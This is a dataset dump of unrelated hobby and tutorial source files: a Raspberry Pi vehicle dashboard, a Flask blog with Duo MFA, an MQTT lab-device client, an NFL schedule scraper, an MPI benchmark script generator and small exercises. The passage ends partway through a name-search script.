ttk\nimport os\nfrom random import randint\nimport CAN_Main\n# Width: 1232\n# Height: 768\nfrom modules import BatteryRect, FuelRect, EfficiencyBar, InformationRectangle, WarningRectangle\n\ntry:\n import RPi.GPIO as GPIO\nexcept ImportError:\n # TODO Marc, write a shell script to re-run the main app as sudo, os.system(\"ps -ef | grep MainApplication.py | grep \"pid\" | kill; sudo MainApplication.py\")\n print(\"Error importing RPi.GPIO! This is probably because you need superuser privileges. You can achieve this by using 'sudo' to run your script\")\nexcept RuntimeError:\n print(\"Error importing RPi.GPIO! This is probably because you need superuser privileges. You can achieve this by using 'sudo' to run your script\")\n\nCHANGE_GUI_MODE_PIN = 21\nREBOOT_PIN = 20\n\nclass MainApplication(object):\n root = Tk()\n frame_rate = 40\n def __init__(self):\n # self.initializeInterrupts() # TODO marc implement once GPIO PINS are setup\n self.initializeMainWindow()\t\n\n self.battery = BatteryRect.BatteryRect(self.root)\n self.fuel = FuelRect.FuelRect(self.root)\n self.infoRect = InformationRectangle.InformationRectangle(self.root)\n self.warnRect = WarningRectangle.WarningRectangle(self.root)\n\n self.canMain = CAN_Main.CAN_Main()\n self.canMain.initializeInstances()\n \t\t\n def run(self):\n self.pollBus()\n self.checkForUpdates()\n self.root.mainloop()\n\n def initializeMainWindow(self):\n self.root.configure(bg=\"white\")\n self.root.title(\"Fuel-Mileage-test\")\n self.root.attributes(\"-fullscreen\", True)\n self.root.bind()\n self.state = False\n self.root.bind(\"\", self.toggle_fullscreen)\n self.root.bind(\"\", self.end_fullscreen)\n \n def toggle_fullscreen(self, event=None):\n self.state = not self.state # Just toggling the boolean\n self.root.attributes(\"-fullscreen\", self.state)\n return \"break\"\n\n def end_fullscreen(self, event=None):\n self.state = False\n self.root.attributes(\"-fullscreen\", False)\n return \"break\"\n\n def pollBus(self):\n self.canMain.pollBus()\n self.root.after(self.frame_rate, self.pollBus)\n\t\n \n def checkForUpdates(self):\n if self.canMain.update_vehicle_speed:\n self.infoRect.updateSpeedRectangle(self.canMain.current_vehicle_speed)\n self.canMain.update_vehicle_speed = False\n\n if self.canMain.update_engine_RPM:\n self.infoRect.updateRPMRectangle(self.canMain.current_engine_RPM)\n self.canMain.update_engine_RPM = False\n \n if self.canMain.update_throttle_percent:\n self.infoRect.updateEngineTPS(self.canMain.current_throttle_percent)\n self.canMain.update_throttle_percent = False\n \n if self.canMain.update_engine_coolant_temp:\n self.infoRect.updateCoolantRectangle(self.canMain.current_engine_coolant_temp)\n self.canMain.update_engine_coolant_temp = False\n\n if self.canMain.update_ess_soc:\n self.infoRect.updateChargeRectangle(self.canMain.current_ess_soc)\n self.battery.updateBatteryCharge(self.canMain.current_ess_soc)\n self.canMain.update_ess_soc = False\n \n# TODO Need to implement can interface for fuel\n# if self.canMain.update_fuel_level:\n# \n# TODO Need to implement can interface for motor TPS\n \n self.root.after(self.frame_rate, self.checkForUpdates)\n\t\n def changeGuiMode(self, channel):\n # TODO Marc, need to cleanup properly, clear all widgets below root\n # Then go to next mode...\n print(\"Changing Modes\")\n\n def rebootSystem(self, channel):\n # TODO marc: we need to cleanup the gui prior to restarting..\n GPIO.cleanup()\n # os.system(\"sudo reboot\")\n\n def initializeInterrupts(self):\n GPIO.setmode(GPIO.BCM)\n \n GPIO.setup(REBOOT_PIN, GPIO.IN)\n GPIO.setup(CHANGE_MODE_PIN, GPIO.IN)\n \n GPIO.add_event_detect(REBOOT_PIN, GPIO.FALLING, callback=self.rebootSystem)\n GPIO.add_event_detect(CHANGE_GUI_MODE_PIN, GPIO.FALLING, callback=self.changeGuiMode)\n\t\nif __name__ == \"__main__\":\n mainApp = MainApplication()\n mainApp.run()\n","sub_path":"infotainment/src/MainApplication.py","file_name":"MainApplication.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"403089725","text":"from utility import TrailingStopLoss\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s - %(levelname)s : %(message)s',\n datefmt='%Y%m%dT%H%M%S')\nlogging.info('Info message')\n\nif __name__ == '__main__':\n def callback():\n logging.info('stop loss')\n\n\n s = TrailingStopLoss('xxxxx', 30, 0.1, callback)\n\n\n\n for i in range(5):\n s.update(i)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"68944997","text":"import sqlite3\nimport ConfigParser\nimport duo_web as duo\nfrom contextlib import closing\nfrom flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash\n\n# config\nDATABASE = '/tmp/flaskr.db'\nDEBUG = True\nSECRET_KEY = 'dev key'\nUSERNAME = 'andrew'\nPASSWORD = 'default'\n\n\n# create flask application\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n\n# config parser\ndef grab_keys(filename='duo.conf'):\n config = ConfigParser.RawConfigParser()\n config.read(filename)\n\n akey = config.get('duo', 'akey')\n ikey = config.get('duo', 'ikey')\n skey = config.get('duo', 'skey')\n host = config.get('duo', 'host')\n return {'akey': akey, 'ikey': ikey, 'skey': skey, 'host': host}\n\n\n# make a database connection\ndef connect_db():\n return sqlite3.connect(app.config['DATABASE'])\n\n\ndef init_db():\n with closing(connect_db()) as db:\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\n# Request DB connections helpers\n@app.before_request\ndef before_request():\n g.db = connect_db()\n\n\n@app.teardown_request\ndef teardown_request(exception):\n db = getattr(g, 'db', None)\n if db is not None:\n db.close()\n\n\n# Routing functions\n@app.route('/')\ndef show_entries():\n cur = g.db.execute('select title, text from entries order by id desc')\n entries = [dict(title=row[0], text=row[1]) for row in cur.fetchall()]\n return render_template('show_entries.html', entries=entries)\n\n\n@app.route('/add', methods=['POST'])\ndef add_entry():\n if not session.get('logged_in'):\n abort(401)\n g.db.execute('insert into entries (title, text) values (?, ?)', [request.form['title'], request.form['text']])\n g.db.commit()\n flash('New entry was successfully posted')\n return redirect(url_for('show_entries'))\n\n\n@app.route('/mfa', methods=['GET', 'POST'])\ndef mfa():\n result = grab_keys()\n sec = duo.sign_request(result['ikey'], result['skey'], result['akey'], \"admin\")\n if request.method == 'GET':\n return render_template('duoframe.html', duohost=result['host'], sig_request=sec)\n if request.method == 'POST':\n user = duo.verify_response(result['ikey'], result['skey'], result['akey'], request.args.get('sig_response'))\n if user:\n return render_template(url_for('mfa'), user=user)\n\n\n@app.route('/success', methods=['POST'])\ndef success():\n return \"Success!\"\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n error = None\n if request.method == 'POST':\n if request.form['username'] != app.config['USERNAME']:\n error = 'Invalid Username'\n elif request.form['password'] != app.config['PASSWORD']:\n error = 'Invalid password'\n else:\n session['logged_in'] = True\n flash('You were logged in')\n return redirect(url_for('mfa'))\n return render_template('login.html', error=error)\n\n\n@app.route('/logout')\ndef logout():\n session.pop('logged_in', None)\n flash('You were logged out')\n return redirect(url_for('show_entries'))\n\n\n# main body\nif __name__ == '__main__':\n app.run()\n","sub_path":"flaskr.py","file_name":"flaskr.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"298920848","text":"import time\nimport paho.mqtt.client as paho\nimport datetime\nimport queue\nimport threading\nimport secrets\nimport sys\nimport os\nimport ast\nimport configparser\nimport tkinter\n\n# Adding the ../MAQLab/.. folder to the system path of python\n# It is temporarily used by this script only\nscript_dir = str()\ntry:\n script_dir = os.path.dirname(__file__)\n maqlab_dir = \"\\\\maqlab\"\n script_dir = script_dir[0:script_dir.index(maqlab_dir)] + maqlab_dir\n if script_dir not in sys.path:\n sys.path.insert(0, script_dir)\nexcept:\n pass\n\n# default broker credentials\nmqtt_hostname = \"mqtt.techfit.at\"\nmqtt_port = 1883\nmqtt_user = \"maqlab\"\nmqtt_pass = \"maqlab\"\nmqtt_tls = False\n\nconfig_file = os.path.dirname(os.path.abspath(__file__)) + \"/maqlab.conf\"\nconfig = configparser.ConfigParser()\n\ntry:\n config.read(config_file)\n if not config.has_section(\"MQTT\"):\n raise Exception\n mqtt_hostname = config.get(\"MQTT\", \"hostname\")\n mqtt_port = config.get(\"MQTT\", \"port\")\n mqtt_user = config.get(\"MQTT\", \"user\")\n mqtt_pass = config.get(\"MQTT\", \"pass\")\n mqtt_tls = config.get(\"MQTT\", \"tls\")\nexcept:\n print(str(\n datetime.datetime.now()) + \" :MAQLAB - Could not open file \" + config_file + \" or data in file is corrupted\")\n exit(0)\n # raise\n\nprint(str(datetime.datetime.now()) + \" :MAQLAB - Configuration loaded successfully\")\n\n\nclass MqttMsg:\n def __init__(self, topic, payload=\"\"):\n self.topic = topic\n self.payload = payload\n\n\nclass MAQLabError(Exception):\n pass\n\n\nclass MAQLab(Exception):\n pass\n\n\n# --------------------------------------------------------------------------------\n# Class M A Q L A B\n# --------------------------------------------------------------------------------\nclass MAQLab:\n\n def __init__(self, host, port, user, password, session_id, stamp=\"\"):\n try:\n self.__q_out = queue.Queue()\n print(str(datetime.datetime.now()) + \" :\" + \"MQTT - started\")\n self.__static_stamp = stamp\n self.__mqtt_hostname = str(host)\n self.__mqtt_port = int(port)\n self.__mqtt_user = str(user)\n self.__mqtt_pass = str(password)\n self.__session_id = session_id\n self.__device_commands = list()\n self.__device_types = list()\n self.__device_models = list()\n self.__device_manufactorers = list()\n self.__device_accessnumbers = list()\n self.__lock = threading.Lock()\n self.__client = paho.Client()\n self.__client.on_connect = self.__on_connect\n self.__client.on_disconnect = self.__on_disconnect\n self.__client.on_message = self.__on_message\n self.__client.reconnect_delay_set(min_delay=1, max_delay=5)\n self.__client.username_pw_set(self.__mqtt_user, self.__mqtt_pass)\n self.__client.connect(self.__mqtt_hostname, self.__mqtt_port)\n self.__client.loop_start()\n attemptions = 1\n while not self.__client.is_connected():\n print(str(datetime.datetime.now()) + \" :MQTT - connecting...attempt#\" + str(attemptions))\n time.sleep(1)\n attemptions += 1\n\n print(str(datetime.datetime.now()) + \" :\" + \"MQTT - ready\")\n except Exception as _e:\n # print(_e)\n print(\n str(datetime.datetime.now()) + \" :\" + \"MAQlab - Connection Error! Are you connected to the internet?\")\n raise _e\n\n # --------------------------------------------------------\n # MQTT Broker callback on_connect\n # --------------------------------------------------------\n def __on_connect(self, _client, userdata, flags, rc):\n if rc == 0:\n print(str(datetime.datetime.now()) + \" :\" + \"MQTT - connected.\")\n self.__client.subscribe(\"maqlab/\" + str(self.__session_id) + \"/rep/#\", qos=0)\n self.__client.subscribe(\"maqlab/\" + str(self.__session_id) + \"/+/rep/#\", qos=0)\n print(str(datetime.datetime.now()) + \" :\" + \"MQTT - Subscriptions done.\")\n\n # ------------------------------------------------------------------------------\n # MQTT Broker callback on_disconnect\n # ------------------------------------------------------------------------------\n def __on_disconnect(self, _client, userdata, rc):\n if rc != 0:\n print(str(datetime.datetime.now()) + \" :\" + \"Unexpected MQTT-Broker disconnection.\")\n\n # ------------------------------------------------------------------------------\n # MQTT Broker callback on_message\n # ------------------------------------------------------------------------------\n def __on_message(self, _client, _userdata, _msg):\n # check topic\n try:\n topic = _msg.topic.decode(\"utf-8\")\n except:\n try:\n topic = _msg.topic.replace(\" \", \" \")\n except:\n return\n # check payload\n try:\n payload = _msg.payload.decode(\"utf-8\")\n except:\n try:\n payload = _msg.payload.replace(\" \", \" \")\n except:\n return\n\n # print(_msg.topic, _msg.payload)\n # on_message is called from an other thread and therefore\n # the object _msg could be manipulated immediately\n # after putting it on the queue before it is handled\n # from the following stage.\n # The solution is to send topic and payload as string rather than as object\n self.__q_out.put(str([topic, payload]), block=False, timeout=0)\n\n # ------------------------------------------------------------------------------\n # Flush the queue\n # ------------------------------------------------------------------------------\n def __flush(self, block=False, timeout=0):\n while True:\n try:\n if self.__q_out.empty():\n return\n else:\n self.__q_out.get(block=block, timeout=timeout)\n except:\n return\n\n # ------------------------------------------------------------------------------\n # Send ( internal used )\n # ------------------------------------------------------------------------------\n def __send(self, msg, stamp=\"_\"):\n try:\n self.__flush()\n self.__client.publish(\"maqlab/\" + self.__session_id + \"/\" + stamp + \"/cmd\" + msg.topic, msg.payload)\n except:\n raise MAQLabError(\"Send error\")\n\n # ------------------------------------------------------------------------------\n # Receive ( internal used )\n # ------------------------------------------------------------------------------\n def __receive(self, block=True, timeout=1.0, stamp=\"_\"):\n try:\n rec_msg = self.__q_out.get(block=block, timeout=timeout)\n try:\n rec_msg = rec_msg.decode(\"utf-8\")\n except:\n pass\n # eval to list object\n rec_msg = ast.literal_eval(rec_msg)\n try:\n msg = MqttMsg(topic=rec_msg[0], payload=rec_msg[1])\n if stamp in msg.topic.split(\"/\"):\n return msg\n else:\n raise MAQLabError(\"Wrong message stamp - message discarded \")\n except:\n raise\n except:\n if block:\n raise MAQLabError(\"Timeout error\")\n else:\n raise MAQLab(\"Empty\")\n\n # ------------------------------------------------------------------------------\n # Send a message and wait for the answer\n # ------------------------------------------------------------------------------\n def send_and_receive(self, receive=True, accessnumber=None, command=\"\", value=\"\", msg=None, block=True,\n timeout=1.0):\n try:\n value = str(value)\n except:\n value = \"\"\n\n if msg is None:\n if not command.startswith(\"/\"):\n command = \"/\" + command\n if accessnumber is not None:\n command = \"/\" + str(accessnumber) + command\n msg = MqttMsg(command, value)\n else:\n if not msg.topic.startswith(\"/\"):\n msg.topic = \"/\" + msg.topic\n if accessnumber is not None:\n msg.topic = \"/\" + str(accessnumber) + msg.topic\n\n with self.__lock:\n try:\n self.__flush()\n if not receive:\n self.__send(msg=msg)\n else:\n stamp = self.__static_stamp\n if stamp == \"\":\n stamp = str(int((time.time() * 1000) % 1000000))\n self.__send(msg=msg, stamp=stamp)\n if receive:\n return self.__receive(block=block, timeout=timeout, stamp=stamp)\n except Exception as _e:\n raise _e\n\n # ------------------------------------------------------------------------------\n # Send a message and returns a list of all answers\n # ------------------------------------------------------------------------------\n def send_and_receive_burst(self, accessnumber=None, command=\"\", value=\"\", msg=None, block=True, timeout=1.0,\n burst_timout=1.0):\n try:\n value = str(value)\n except:\n value = \"\"\n\n if msg is None:\n if not command.startswith(\"/\"):\n command = \"/\" + command\n if accessnumber is not None:\n command = \"/\" + str(accessnumber) + command\n msg = MqttMsg(command, value)\n else:\n if not msg.topic.startswith(\"/\"):\n msg.topic = \"/\" + msg.topic\n if accessnumber is not None:\n msg.topic = \"/\" + str(accessnumber) + msg.topic\n\n _timeout = timeout\n msg_list = list()\n with self.__lock:\n try:\n stamp = self.__static_stamp\n if stamp == \"\":\n stamp = str(int((time.time() * 1000) % 1000000))\n self.__flush()\n self.__send(msg=msg, stamp=stamp)\n while True:\n try:\n msg_received = self.__q_out.get(block=block, timeout=_timeout)\n try:\n msg_received = msg_received.decode(\"utf-8\")\n except:\n pass\n msg_received = ast.literal_eval(msg_received)\n msg = MqttMsg(topic=msg_received[0], payload=msg_received[1])\n if stamp in msg.topic:\n _timeout = burst_timout\n msg_list.append(msg)\n except:\n if len(msg_list) == 0:\n raise MAQLabError(\"Empty data\")\n return msg_list\n except Exception as _e:\n raise _e\n\n # ------------------------------------------------------------------------------\n #\n # ------------------------------------------------------------------------------\n def load_devices(self):\n try:\n detected_devices_raw = self.send_and_receive_burst(command=\"/?\", burst_timout=0.5)\n try:\n detected_devices = []\n for item in detected_devices_raw:\n try:\n if \"accessnumber\" in item.topic:\n topic_splitted = item.topic.split(\"/\")\n devicename = topic_splitted[topic_splitted.index(\"rep\") + 1]\n accessnumber = int(item.payload)\n detected_devices.append(tuple((devicename, accessnumber)))\n except:\n raise\n except:\n raise\n # we have the list of device\n # next task is to request the details of the device\n # reading the available commands and manufactor from each device\n # lets clear the actual list\n self.__device_commands.clear()\n self.__device_types.clear()\n self.__device_models.clear()\n self.__device_manufactorers.clear()\n\n for device in detected_devices:\n print(str(datetime.datetime.now()) + \" :\" + \"MAQlab - Detected: \" + str(\n device[0]) + \" Accessnumber is \" + str(device[1]))\n try:\n number = int(device[1])\n except:\n raise\n self.__device_accessnumbers.append(number)\n reps = maqlab.send_and_receive_burst(command=str(device[1]) + \"/?\", burst_timout=0.5)\n for rep in reps:\n if \"commands\" in rep.topic:\n self.__device_commands.append(rep.payload)\n elif \"manufactorer\" in rep.topic:\n self.__device_manufactorers.append(rep.payload)\n elif \"model\" in rep.topic:\n self.__device_models.append(rep.payload)\n elif \"devicetype\" in rep.topic:\n self.__device_types.append(rep.payload)\n\n # print(self.__device_models)\n # print(self.__device_accessnumbers)\n # print(self.__device_manufactorers)\n # print(self.__device_commands)\n # print(self.__device_types)\n\n except:\n raise\n return detected_devices\n\n # ------------------------------------------------------------------------------\n #\n # ------------------------------------------------------------------------------\n def close(self):\n try:\n self.__client.on_disconnect = None\n self.__client.on_connect = None\n self.__client.disconnect()\n except:\n pass\n\n def __get_model(self):\n return self.__device_models\n\n def __get_accessnumbers(self):\n return self.__device_accessnumbers\n\n def __get_commands(self):\n return self.__device_commands\n\n def __get_manufactorers(self):\n return self.__device_manufactorers\n\n def __get_types(self):\n return self.__device_types\n\n def __isconnected(self):\n return self.__client.is_connected()\n\n # ------------------------------------------------------------------------------\n #\n # ------------------------------------------------------------------------------\n def __str__(self):\n return self.__session_id\n\n device_models = property(__get_model)\n device_accessnumbers = property(__get_accessnumbers)\n device_types = property(__get_types)\n device_manufactorers = property(__get_manufactorers)\n device_commands = property(__get_commands)\n is_connected = property(__isconnected)\n\n\ntry:\n maqlab = MAQLab(host=mqtt_hostname,\n port=mqtt_port,\n user=mqtt_user,\n password=mqtt_pass,\n session_id=secrets.token_urlsafe(3).lower())\n maqlab.load_devices()\n # window = tkinter.Tk()\n # window.title = \"MAQLAB device Monitor\"\n\nexcept Exception as e:\n maqlab = None\n","sub_path":"MAQLab/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":15379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"646461285","text":"# Given inorder and postorder traversal of a tree, construct the binary tree.\n\n# Note:\n# You may assume that duplicates do not exist in the tree.\n\nimport Tree\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n\tdef buildSubTree(self, inorder, postorder, inIndex, postIndex, length):\n\t\t# if len(preorder) == 0:\n\t\t# \treturn None\n\t\t# else:\n\t\tnode = Tree.TreeNode(postorder[postIndex + length - 1])\n\t\tleftLen = inorder.index(node.val) - inIndex\n\t\trightLen = length - leftLen - 1\n\t\tif leftLen == 0:\n\t\t\tleftNode = None\n\t\telse:\n\t\t\tleftInIndex = inIndex\n\t\t\tleftPostIndex = postIndex\n\t\t\tleftNode = self.buildSubTree(inorder, postorder, leftInIndex, leftPostIndex, leftLen)\n\t\tif rightLen == 0:\n\t\t\trightNode = None\n\t\telse:\n\t\t\trightInIndex = inIndex + 1 + leftLen\n\t\t\trightPostIndex = postIndex + leftLen\n\t\t\trightNode = self.buildSubTree(inorder, postorder, rightInIndex, rightPostIndex, rightLen)\n\t\tnode.left = leftNode\n\t\tnode.right = rightNode\n\t\treturn node\n\t\t\n\tdef buildTree(self, inorder, postorder):\n\t\t\"\"\"\n\t\t:type inorder: List[int]\n\t\t:type postorder: List[int]\n\t\t:rtype: TreeNode\n\t\t\"\"\"\n\t\t\n\t\tif len(inorder) == 0:\n\t\t\treturn None\n\n\t\treturn self.buildSubTree(inorder, postorder, 0, 0, len(inorder))\n\n# 1\n# / \\\n# 2 3\n# / \\ / \\\n# 4 5 6 7 \n\nso = Solution()\ninorder = [4,2,5,1,6,3,7]\npostorder = [4,5,2,6,7,3,1]\nTree.disp(so.buildTree(inorder, postorder))","sub_path":"python/106_Construct_Binary_Tree_from_Inorder_and_Postorder_Traversal.py","file_name":"106_Construct_Binary_Tree_from_Inorder_and_Postorder_Traversal.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"260653073","text":"from bs4 import BeautifulSoup\nimport pandas as pd\nimport numpy as np\nimport requests\nfrom random import randint\nfrom selenium import webdriver\nfrom time import sleep\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument('--disable-dev-shm-usage')\ndriver = webdriver.Chrome('chromedriver', chrome_options=chrome_options)\n\nteams = ['htx', 'kan', 'nyj', 'buf', 'sea', 'atl', 'phi', 'was', 'cle', 'rav', 'mia', 'nwe', 'gnb', 'min', 'clt', 'jax', 'chi', 'det', 'rai', 'car', 'sdg', 'cin', 'crd', 'sfo', 'tam', 'nor', 'dal', 'ram', 'pit', 'nyg', 'oti', 'den']\n\nno_table = []\nurl = 'https://www.pro-football-reference.com'\nyear = 2021\n\nfor team in teams:\n week = 101\n driver.get(url + '/teams/' + str(team) + '/2021.htm') \n sleep(randint(2,10))\n table = pd.read_html(driver.page_source)\n cols = ['Week', 'Day', 'Date', 'Time', 'Home',\t'Opp_Name', 'Final']\n dft = table[0]\n dft.columns = cols\n dft.dropna(subset=['Opp_Name'], inplace=True)\n dft['Week'] = dft.Week.str.replace(\"Pre \", \"10\", regex=True)\n dft = dft[~dft.Opp_Name.str.contains(\"Preseason\", na=False)]\n dft = dft[~dft.Opp_Name.str.contains(\"Regular Season\", na=False)]\n # dft = dft[dft.Week == week]\n dft[['Result','Score']] = dft.Final.str.split(\",\",expand=True)\n dft[['Tm','Opp']] = dft.Score.str.split(\"-\",expand=True)\n dft['Result'] = [0 if r=='L' else 1 for r in dft['Result']]\n dft['Home'] = [0 if r=='@' else 1 for r in dft['Home']]\n dft = dft.drop(['Day', 'Time', 'Final', 'Score'], axis=1)\n dft['Result'] = dft['Result'].fillna(0)\n dft['Tm'] = dft['Tm'].fillna(0)\n dft['Opp'] = dft['Opp'].fillna(0)\n dft['Team'] = str(team)\n dft = dft.set_index('Team')\n dft.reset_index(inplace=True)\n no_table.append(dft)\n\n\ndriver.close() \ndf = pd.concat(no_table)\n\ndf['Opp_Name'] = df['Opp_Name'].astype('category')\ndf['Team'] = df['Team'].astype('category')\ndf['Week'] = df['Week'].astype('int')\ndf['Home'] = df['Home'].astype('int')\ndf['Result'] = df['Result'].astype('int')\ndf['Tm'] = df['Tm'].astype('int')\ndf['Opp'] = df['Opp'].astype('int')\ndf.to_csv('2021df_pretest.csv')","sub_path":"NFL2021-PreWeeks_parser.py","file_name":"NFL2021-PreWeeks_parser.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"601356195","text":"def open_file_write():\n '''This function will write a bash file which auto run the testing of the project to get the running data'''\n with open('script.sh', 'w') as file:\n file.write('#! /bin/bash\\n')\n # compile files by three commands below\n file.write('mpicc omp_mpi_main.c tools.c binary.c mpi_binary.c mpi_enum.c mpi_merge.c mpi_quick.c merge.c quick.c enum.c start_algorithm.c omp_merge.c omp_enum.c omp_quick.c -o omp_mpi_main\\n')\n file.write('mpicc main.c tools.c binary.c mpi_binary.c mpi_enum.c mpi_merge.c mpi_quick.c merge.c quick.c enum.c start_algorithm.c -o main\\n')\n file.write(\n 'gcc project_file.c binary.c enum.c merge.c quick.c start_algorithm.c tools.c -o project_file\\n')\n # edit here to change how many times you want to test\n\n for q in range(1, 4):\n # edit here to change the array size range you want to test\n for k in [5000, 20000, 50000]:\n # edit here to change the process num you want to test\n for i in range(1, 9):\n # edit here to change the thread num you want to test\n for j in range(1, 9):\n file.write(\n 'mpirun -np {} omp_mpi_main {} all {}\\n'.format(i, k, j)) # mpi&omp for all\n file.write(\n 'printf \"current seed: {}, process: {}, thread: {}, turn: {}\\\\n\"\\n'.format(k, i, j, q))\n file.write(\n 'mpirun -np {} main {} all -mpi\\n'.format(i, k)) # mpi for all\n file.write('./project_file {} all\\n'.format(k)) # serial\n\n # edit here to change the array size range you want to test\n for k in [500000, 3000000, 8000000, 15000000, 30000000]:\n # edit here to change the process num you want to test\n for i in range(1, 9):\n # edit here to change the thread num you want to test\n for j in range(1, 9):\n file.write(\n 'mpirun -np {} omp_mpi_main {} quick {}\\n'.format(i, k, j)) # mpi&omp for quick\n file.write(\n 'mpirun -np {} omp_mpi_main {} merge {}\\n'.format(i, k, j)) # mpi&omp for merge\n file.write(\n 'printf \"current seed: {}, process: {}, thread: {}, turn: {}\\\\n\"\\n'.format(k, i, j, q))\n file.write(\n 'mpirun -np {} main {} quick -mpi\\n'.format(i, k)) # mpi for quick\n file.write(\n 'mpirun -np {} main {} merge -mpi\\n'.format(i, k)) # mpi for merge\n file.write('./project_file {} quick\\n'.format(k)) # serial\n file.write('./project_file {} merge\\n'.format(k)) # serial\n\n\nif __name__ == '__main__':\n open_file_write()\n","sub_path":"submit/auto_get_result.py","file_name":"auto_get_result.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"386100374","text":"\"\"\"\nQ1. Why is the report method untestable ? [2 pts]\nAns:- The report method has external depndencies.\n It depends on the \"open function\" and the Txt file.\n\n\n\nQ2. How will you change the api of the report method to make it more testable ? [2 pts]\nAns:- The API of the report method can be changed by the the number of arguments it accepts as\n \"report(self,numbers,filehandler)\"\nwhere \"filehandler\" will be used for creating an impression of reading values from file.\n\n\"\"\"\nclass FizzBuzz(object):\n def report(self, numbers,opener):\n\n report_file = opener('c:/temp/fizzbuzz_report.txt', 'w')\n\n for number in numbers:\n msg = str(number) + \" \"\n fizzbuzz_found = False\n if number % 3 == 0:\n msg += \"fizz \"\n fizzbuzz_found = True\n if number % 5 == 0:\n msg += \"buzz \"\n fizzbuzz_found = True\n\n if fizzbuzz_found:\n report_file.write(msg + \"\\n\")\n\n report_file.close()\n\nif \"__main__\" == __name__:\n fb = FizzBuzz()\n fb.report(range(100))\n\n \n","sub_path":"FizzBuzz.py","file_name":"FizzBuzz.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"188101039","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\ndef populate_tutor_in_group(apps, schema_editor):\n Tutor = apps.get_model('tutor', 'Tutor')\n TutorInTutorGroup = apps.get_model('tutor', 'TutorInTutorGroup')\n for tu in Tutor.objects.all():\n for tg in tu.groups.all():\n TutorInTutorGroup(tutor=tu, tutorgroup=tg).save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('tutor', '0008_tutorintutorgroup'),\n ]\n\n operations = [\n migrations.RunPython(populate_tutor_in_group),\n ]\n","sub_path":"mftutor/tutor/migrations/0009_auto_20150708_1300.py","file_name":"0009_auto_20150708_1300.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"16725055","text":"FILE_PATH = r\"yob1994.txt\"\nRESULTS_FILE_PATH = r\"results.txt\"\n\nSEARCH_MODE = \\\n[\\\n\"Exact March\",\\\n\"Start with\",\\\n\"Ends with\",\\\n\"Contains\"\\\n]\n\ndef find(msg_list, letters, mode):\n\tresult = []\n\tfor msg in msg_list:\n\t\tif (mode == 1 and msg[0] == letters) or \\\n\t\t\t(mode == 2 and msg[0].lower().startswith(letters.lower())) or \\\n\t\t\t(mode == 3 and msg[0].lower().endswith(letters.lower())) or \\\n\t\t\t(mode == 4 and letters.lower() in msg[0].lower()):\n\t\t\tresult.append(msg)\n\treturn result\n\ndef get_find_mode():\n\tprint (\"\\nHow do you want to search:\")\n\ti = 1\n\tfor line in SEARCH_MODE:\n\t\tprint (\"%d\\t%s\" % (i, line))\n\t\ti += 1\n\tmode = 0\n\twhile True:\n\t\tmode = input(\"Select: \")\n\t\tif mode and mode.isdigit():\n\t\t\tmode = int(mode)\n\t\telse:\n\t\t\tprint (\"Please enter a number between 1 to %d\" % len(SEARCH_MODE))\n\t\t\tcontinue\n\n\t\tif mode >= 1 and mode <= len(SEARCH_MODE):\n\t\t\tbreak\n\t\telse:\n\t\t\tprint (\"Please enter a number between 1 to %d\" % len(SEARCH_MODE))\n\n\treturn mode\n\ndef get_msg(file_path):\n\tf = open(file_path) \n\tmsg_list = []\n\tfor line in f:\n\t\tmsg_list.append(line.strip().split(','))\n\tf.close()\n\treturn msg_list\n\ndef get_items_max_length(msg_list):\n\titems_len = []\n\tfor items in msg_list:\n\t\tfor i in range(len(items)):\n\t\t\tif i >= len(items_len):\n\t\t\t\titems_len.append(len(items[i]))\n\t\t\telse:\n\t\t\t\tif items_len[i] < len(items[i]):\n\t\t\t\t\titems_len[i] = len(items[i])\n\treturn items_len\n\ndef get_print_items(items_len, items):\n\tformat_str = \"\"\n\tfor i in range(len(items)):\n\t\tformat_str += \"%\"\n\t\tif i != 2:\n\t\t\tformat_str += \"-\"\n\t\tformat_str += str(items_len[i]) + \"s \"\n\treturn format_str % tuple(items)\n\nif __name__ == \"__main__\":\n\tmsg_list = get_msg(FILE_PATH)\n\tf = open(RESULTS_FILE_PATH, \"w\")\n\twhile True:\n\t\tmode = get_find_mode();\n\t\tletters = input(\"Look for: \")\n\t\tif not letters:\n\t\t\tbreak\n\t\tret = find(msg_list, letters, mode)\n\t\tif mode > 1:\n\t\t\tf.write(\"\\nLook for \\\"%s\\\" by \\\"%s\\\":\\n\" % (letters, SEARCH_MODE[mode-1]))\n\t\tif ret:\n\t\t\titems_len = get_items_max_length(ret)\n\t\t\tfor data in ret:\n\t\t\t\tif mode > 